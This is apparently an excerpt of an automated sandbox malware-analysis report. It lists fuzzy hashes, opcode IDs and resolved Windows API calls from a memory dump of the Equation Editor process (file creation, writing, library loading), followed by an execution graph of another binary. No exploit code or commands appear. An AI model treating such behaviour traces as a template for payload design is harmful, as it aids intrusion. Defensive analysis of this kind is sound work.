                                                                                                                                                • Instruction Fuzzy Hash: 6231CC6180D7C19FD716D630AE6A7A4BF607B12500B0C8A9B84C64F1F3E2A7924A935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 82cdf1e5fea91c7d4566ed2e81d9480f45649552ea509d1e7972ac48aeff823a
                                                                                                                                                • Instruction ID: 0c6900d50d162e0fd3bdf02eb5013493e5c2883f4fcdefd4ae38009e7e1ea289
                                                                                                                                                • Opcode Fuzzy Hash: 82cdf1e5fea91c7d4566ed2e81d9480f45649552ea509d1e7972ac48aeff823a
                                                                                                                                                • Instruction Fuzzy Hash: 9B31BD6180D7C19FD716D620AE5A7A4BF607B13500F0D8ADB84C64F1F3E2A7924A935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: c3eb98bdf25d8c78ada52c0911afe100e6dab38bdb237c7034416552be4e9306
                                                                                                                                                • Instruction ID: 05bbd2bf78af7039cf8b22a67d967269fb1e93648e335c3dd1eff2cd0fe034d3
                                                                                                                                                • Opcode Fuzzy Hash: c3eb98bdf25d8c78ada52c0911afe100e6dab38bdb237c7034416552be4e9306
                                                                                                                                                • Instruction Fuzzy Hash: 1531CA6180D3C15FD712D660AE5A7A4BF60BB12500F0D8ADBC4C64F1F3E2A6924A936A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 4046427d3c48354f5e30962364d2386149e26f0a40cd5cb1117a9c35a6147eab
                                                                                                                                                • Instruction ID: f0e3ecda42822484bfb172632a3301a260e2775152b2a426ccabfd25980b80fb
                                                                                                                                                • Opcode Fuzzy Hash: 4046427d3c48354f5e30962364d2386149e26f0a40cd5cb1117a9c35a6147eab
                                                                                                                                                • Instruction Fuzzy Hash: 6E31AB6180D7C05FD712D6606E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6924A936B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 394e3be1db9414d480c3c3acd90b535f9c4f877ab97d44f231d2398ca75b1b18
                                                                                                                                                • Instruction ID: f0e3ecda42822484bfb172632a3301a260e2775152b2a426ccabfd25980b80fb
                                                                                                                                                • Opcode Fuzzy Hash: 394e3be1db9414d480c3c3acd90b535f9c4f877ab97d44f231d2398ca75b1b18
                                                                                                                                                • Instruction Fuzzy Hash: 6E31AB6180D7C05FD712D6606E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6924A936B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 5b3aac8f888d5116862156d71f5f9caa17f600627bee825ba8d06189eb94f01a
                                                                                                                                                • Instruction ID: 1f59aabcfd0e62035981e7c23336a97052811792d36ff1a3456bbc24d9a1d352
                                                                                                                                                • Opcode Fuzzy Hash: 5b3aac8f888d5116862156d71f5f9caa17f600627bee825ba8d06189eb94f01a
                                                                                                                                                • Instruction Fuzzy Hash: DE31AB6180D7C05FD712D6606E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6924A936B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: cd2170bbd205a0100983fa0dac93cefa040e1fe52a958de0140f1e1b6cdf1d7a
                                                                                                                                                • Instruction ID: 1b7c64b0003ef79d54f312b498ec360c43ba9309f7ac7fdc062bbbb5e353193b
                                                                                                                                                • Opcode Fuzzy Hash: cd2170bbd205a0100983fa0dac93cefa040e1fe52a958de0140f1e1b6cdf1d7a
                                                                                                                                                • Instruction Fuzzy Hash: D731BA6140D7C01FD722D7706EAA7A4BF60BB13500F0D86CB85C54F1F3E2A6924A936A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: fdbe4d8aa01f499e842a974e057939047fcc348efd223732417a8103b230cdd8
                                                                                                                                                • Instruction ID: c12df2f5ff598776f9ce0f526dd880eb7cc9450e6d627ef2000c7867b9459ede
                                                                                                                                                • Opcode Fuzzy Hash: fdbe4d8aa01f499e842a974e057939047fcc348efd223732417a8103b230cdd8
                                                                                                                                                • Instruction Fuzzy Hash: 4C31AB6180D7C05FD712D6606E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6924A936B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 043d1d805c8cfce0d42c5ea88bbb34bef2c8a1233ee0f43f0282cc9beaa4d654
                                                                                                                                                • Instruction ID: 7c99c1e1fefc90c7193b27acb797d7fcb3de5b950230a7660e29b3dca15df7e7
                                                                                                                                                • Opcode Fuzzy Hash: 043d1d805c8cfce0d42c5ea88bbb34bef2c8a1233ee0f43f0282cc9beaa4d654
                                                                                                                                                • Instruction Fuzzy Hash: 5331DE6180D7C05FD712D7706E5A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6A24A936A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: a0fe542320fc140bb1c1915ba26eb4654991678b1457a94a6da4369e1856c7c9
                                                                                                                                                • Instruction ID: ea46d85c259854db12df81ba775c4d1b81da1c9e345a6f49358e86281622205c
                                                                                                                                                • Opcode Fuzzy Hash: a0fe542320fc140bb1c1915ba26eb4654991678b1457a94a6da4369e1856c7c9
                                                                                                                                                • Instruction Fuzzy Hash: C431CB6180D7C05FD712D7706E9A7A4BF60BB13500F0D8ADBC5C54F1F3E2A6A24A936A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0350047C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 5bc56cd7e8ca869814bb5e96c7447b5888daa544d17e62665bf2a9042e4a3518
                                                                                                                                                • Instruction ID: 1e09c7f1bfb41748c550bae2249c5416bcd624f60688c281b06e070921f24a96
                                                                                                                                                • Opcode Fuzzy Hash: 5bc56cd7e8ca869814bb5e96c7447b5888daa544d17e62665bf2a9042e4a3518
                                                                                                                                                • Instruction Fuzzy Hash: 5631DA6180D3C05FD712D7606E9A7A4BF60BB13A00F1D86CBC1C54F0F3E2A6924A936A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0350047C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 3da7f3a7ba8021afd66381b02291edbbc798abc62c6d3f295ce1b88344e7fcbf
                                                                                                                                                • Instruction ID: 1fe45c2f3e3aafee490d40dd351bcf16f66e12d32b6dea93725426890d9ff9c8
                                                                                                                                                • Opcode Fuzzy Hash: 3da7f3a7ba8021afd66381b02291edbbc798abc62c6d3f295ce1b88344e7fcbf
                                                                                                                                                • Instruction Fuzzy Hash: 0A31DA6180D3C05FD712D7606E5A7A4BF60BF13A00F1D86CBC1C54F0F3E2A6924A936A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(03500523,0350053A,00000000,00000000,00000000,?,0350053A,03500523,00000000,00000000,00000000,00000000,035004DC,00000050,00000000), ref: 03500632
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: d4d463e9b9c9ed4a6d9070107b554e4f8b46087707d5ad8be43035a7d0fae483
                                                                                                                                                • Instruction ID: eb199e724a190ef480d18b6166f87b6a8cf7948356008b11cbb90e9cf6c7ecd1
                                                                                                                                                • Opcode Fuzzy Hash: d4d463e9b9c9ed4a6d9070107b554e4f8b46087707d5ad8be43035a7d0fae483
                                                                                                                                                • Instruction Fuzzy Hash: 4C2180B04083867FD711EB94DD42B6FBABAFBC1A00F14894DB1914B0F1E672960886A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: e8cdf42cac368371fbd2f8a10de28b9d021d251779e62dfb49a7f97990187218
                                                                                                                                                • Instruction ID: e142d72068bc14916b872ec600f328c42136702eff1351da71d7d38d7af7d3b0
                                                                                                                                                • Opcode Fuzzy Hash: e8cdf42cac368371fbd2f8a10de28b9d021d251779e62dfb49a7f97990187218
                                                                                                                                                • Instruction Fuzzy Hash: 9D21036540D3C01FD321D7702E9A7A9BE607F92500F1D86CE81C54F1F3E2AB910A931E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: dcf0b0c4c4cb304281e93999da3cc2d2c974dc5c0ff9a8768084b643f31265cf
                                                                                                                                                • Instruction ID: ccfec9ec47e85d2b98f3fc27416c3ad1ab3487f0c11164c3e4aade9de99dda85
                                                                                                                                                • Opcode Fuzzy Hash: dcf0b0c4c4cb304281e93999da3cc2d2c974dc5c0ff9a8768084b643f31265cf
                                                                                                                                                • Instruction Fuzzy Hash: 0F1126A544C3C11FE321D7702E9A7A5BF60BB52500F0DC68E91C54F1F3E2A69106935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: de31582968c94efa9818b26229c2e82a7a8d94e9a828fc457e667c7dec0a266d
                                                                                                                                                • Instruction ID: cb20da02bc6f28de7507a500fa7e00f8514ac4d1ea540b262f1237e7373ccef3
                                                                                                                                                • Opcode Fuzzy Hash: de31582968c94efa9818b26229c2e82a7a8d94e9a828fc457e667c7dec0a266d
                                                                                                                                                • Instruction Fuzzy Hash: F41184714083826FD711EA50DC45F6FBBBAFFC1B50F148A4DB1914B0E1E7B2D50886A2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(03500523,0350053A,00000000,00000000,00000000,?,0350053A,03500523,00000000,00000000,00000000,00000000,035004DC,00000050,00000000), ref: 03500632
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: 19abb07f664a7bfaba3f6f8eb50ada1189bdad441aab37431a0cbd58e181a6b3
                                                                                                                                                • Instruction ID: 701c8b9a13d815a9ef59800ef870f495c1fa73dc20a4ace47711d7ec5af402a7
                                                                                                                                                • Opcode Fuzzy Hash: 19abb07f664a7bfaba3f6f8eb50ada1189bdad441aab37431a0cbd58e181a6b3
                                                                                                                                                • Instruction Fuzzy Hash: 55115E700083467FD712EA94DD42F6FBBBAFBC4B00F048D18B191460F1E77296088AA6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 581e4607c75e21bd5b588b68bef4f5ea4c1a47839374d9aee5ee39d27777e0c5
                                                                                                                                                • Instruction ID: 0bea3b7878954fe10f5390b319aa35e6398c1eb1cdd9c9a2b6b1d4d871e0549f
                                                                                                                                                • Opcode Fuzzy Hash: 581e4607c75e21bd5b588b68bef4f5ea4c1a47839374d9aee5ee39d27777e0c5
                                                                                                                                                • Instruction Fuzzy Hash: 06019EA540D3C02FE762D7702D5AB95BF647B52604F0DCA8EA5C84F1E3E2A6910A835A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                                                                                                                                • Instruction ID: 3db8ff203191e3e63422eec0be7a3c2528f7d4a28e40121cc7082381baa8256a
                                                                                                                                                • Opcode Fuzzy Hash: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                                                                                                                                • Instruction Fuzzy Hash: 0BF0F671008346AFD712DE54DC41F6FBAAAFBC5B40F048E1DB1948A0F1D77299188AA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0350047C
                                                                                                                                                  • Part of subcall function 03500496: LoadLibraryW.KERNEL32(03500486), ref: 03500496
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFileLibraryLoad
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2049390123-0
                                                                                                                                                • Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                                                                                                                                • Instruction ID: 2adc71b2a95f19d0e95f35495634d00a4b949c19b1ea06e54617cd84c8522461
                                                                                                                                                • Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                                                                                                                                • Instruction Fuzzy Hash: E1E012745483803AD531D7305D5AF99AE643F81B04F09C999A3C89F1E3D6B250058229
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ExitProcess.KERNELBASE(00000000,?,035006B0,?,03500694,?,03500657,?,?,0350063E,00000000,00000000,00000000,00000000,035004DC,00000050), ref: 035006C1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                                                                                • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                                                                                                • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                                                                                • Instruction ID: 0c1e8f26191b028feb2e96089c45d16e2307b3e4b0d136f96d5eaa2098818edf
                                                                                                                                                • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                                                                                • Instruction Fuzzy Hash: 92D01C31202A029BC204DB04DA80A1AF36AFBC8210B28C269E4004B6A9C330E8A2CA90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:3.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:4.3%
                                                                                                                                                Total number of Nodes:1935
                                                                                                                                                Total number of Limit Nodes:70
                                                                                                                                                execution_graph 69787 252ba5 69788 212b25 69787->69788 69789 252baf 69787->69789 69811 212b83 7 API calls 69788->69811 69794 252bf5 69789->69794 69795 252bce 69789->69795 69793 212b2f 69802 212b44 69793->69802 69815 213837 44 API calls ___scrt_fastfail 69793->69815 69796 2133c6 23 API calls 69794->69796 69817 2133c6 69795->69817 69799 252bf1 GetForegroundWindow ShellExecuteW 69796->69799 69805 252c26 69799->69805 69803 212b5f 69802->69803 69816 2130f2 Shell_NotifyIconW ___scrt_fastfail 69802->69816 69809 212b66 SetCurrentDirectoryW 69803->69809 69805->69803 69808 2133c6 23 API calls 69808->69799 69810 212b7a 69809->69810 69831 212cd4 7 API calls 69811->69831 69813 212b2a 69814 212c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 69813->69814 69814->69793 69815->69802 69816->69803 69818 2133dd 69817->69818 69819 2530bb 69817->69819 69832 2133ee 69818->69832 69837 22fddb 69819->69837 69822 2133e8 69824 216350 69822->69824 69823 2530c5 __fread_nolock _wcslen 69825 216362 69824->69825 69826 254a51 69824->69826 69859 216373 69825->69859 69864 214a88 23 API calls __fread_nolock 69826->69864 69829 21636e 69829->69808 69830 254a5b 69831->69813 69833 2133fe _wcslen 69832->69833 69834 22fddb 23 API calls 69833->69834 69835 213411 __fread_nolock 69833->69835 69836 253127 __fread_nolock 69834->69836 69835->69822 69839 22fde0 69837->69839 69840 22fdfa 69839->69840 69843 22fdfc 69839->69843 69847 234ead 7 API calls 2 library calls 69839->69847 69848 23ea0c 69839->69848 69840->69823 69842 23066d 69856 2332a4 RaiseException 69842->69856 69843->69842 69855 2332a4 RaiseException 69843->69855 69845 23068a 69845->69823 69847->69839 69853 243820 _unexpected 69848->69853 69849 24385e 69858 23f2d9 21 API calls __dosmaperr 69849->69858 69850 243849 RtlAllocateHeap 69852 24385c 69850->69852 69850->69853 69852->69839 69853->69849 69853->69850 69857 234ead 7 API calls 2 library calls 69853->69857 69855->69842 69856->69845 69857->69853 69858->69852 69860 216382 69859->69860 69861 2163a9 __fread_nolock 69859->69861 69860->69861 69862 22fddb 23 API calls 69860->69862 69861->69829 69863 254a91 __fread_nolock 69862->69863 69864->69830 69865 212de3 69866 212df0 69865->69866 69867 212e09 69866->69867 69868 252c2b ___scrt_fastfail 69866->69868 69879 212da5 69867->69879 69869 252c47 GetOpenFileNameW 69868->69869 69870 252c96 69869->69870 69914 216b57 69870->69914 69874 252cab 69874->69874 69876 212e27 69895 2144a8 69876->69895 69880 251f50 69879->69880 69881 212db2 GetLongPathNameW 69880->69881 69882 216b57 23 API calls 69881->69882 69883 212dda 69882->69883 69884 213598 69883->69884 69921 21a961 69884->69921 69886 2135aa 69887 2135c0 69886->69887 69888 2532eb 69886->69888 69925 21515f 69887->69925 69893 25330d 69888->69893 69933 22ce60 CompareStringW 69888->69933 69894 2135df 69894->69876 69934 214ecb 69895->69934 69898 253833 69956 282cf9 69898->69956 69900 214ecb 91 API calls 69902 2144e1 69900->69902 69901 253848 69913 253854 69901->69913 69983 214f39 69901->69983 69902->69898 69903 2144e9 69902->69903 69905 2144f5 69903->69905 69903->69913 69982 21940c 111 API calls _wcslen 69905->69982 69907 212e31 69908 214f39 64 API calls 69910 253a5f 69908->69910 69910->69908 69913->69910 69989 2795ad 40 API calls _wcslen 69913->69989 69990 280b5a 23 API calls 69913->69990 69991 21a4a1 23 API calls __fread_nolock 69913->69991 69915 254ba1 69914->69915 69918 216b67 _wcslen 69914->69918 70632 2193b2 23 API calls __fread_nolock 69915->70632 69917 254baa 69917->69917 69919 22fddb 23 API calls 69918->69919 69920 216b7d __fread_nolock 69918->69920 69919->69920 69920->69874 69922 21a976 69921->69922 69923 22fddb 23 API calls 69922->69923 69924 21a984 69923->69924 69924->69886 69928 21516e __fread_nolock 69925->69928 69926 22fddb 23 API calls 69927 2135cc 69926->69927 69929 2135f3 69927->69929 69928->69926 69932 213605 __fread_nolock 69929->69932 69930 22fddb 23 API calls 69931 21363b 69930->69931 69931->69894 69932->69930 69933->69888 69992 214e90 LoadLibraryA 69934->69992 69939 214ef6 LoadLibraryExW 70000 214e59 LoadLibraryA 69939->70000 69940 253ccf 69942 214f39 64 API calls 69940->69942 69944 253cd6 69942->69944 69945 214e59 3 API calls 69944->69945 69947 253cde 69945->69947 70021 2150f5 69947->70021 69948 214f20 69948->69947 69949 214f2c 69948->69949 69951 214f39 64 API calls 69949->69951 69953 2144cd 69951->69953 69953->69898 69953->69900 69955 253d05 69957 282d15 69956->69957 69958 21511f 59 API calls 69957->69958 69959 282d29 69958->69959 70306 282e66 69959->70306 69962 2150f5 41 API calls 69963 282d56 69962->69963 69964 2150f5 41 API calls 69963->69964 69965 282d66 69964->69965 69966 2150f5 41 API calls 69965->69966 69967 282d81 69966->69967 69968 2150f5 41 API calls 69967->69968 69969 282d9c 69968->69969 69970 21511f 59 API calls 69969->69970 69971 282db3 69970->69971 69972 23ea0c ___std_exception_copy 22 API calls 69971->69972 69973 282dba 69972->69973 69974 23ea0c ___std_exception_copy 22 API calls 69973->69974 69975 282dc4 69974->69975 69976 2150f5 41 API calls 69975->69976 69977 282dd8 69976->69977 69978 2828fe 29 API calls 69977->69978 69979 282dee 69978->69979 69980 282d3f 69979->69980 70312 2822ce 69979->70312 69980->69901 69982->69907 69984 214f43 69983->69984 69986 214f4a 69983->69986 69985 23e678 63 API calls 69984->69985 69985->69986 69987 214f59 69986->69987 69988 214f6a FreeLibrary 69986->69988 69987->69913 69988->69987 69989->69913 69990->69913 69991->69913 69993 214ec6 69992->69993 69994 214ea8 GetProcAddress 69992->69994 69997 23e5eb 69993->69997 69995 214eb8 69994->69995 69995->69993 69996 214ebf FreeLibrary 69995->69996 69996->69993 70029 23e52a 69997->70029 69999 214eea 69999->69939 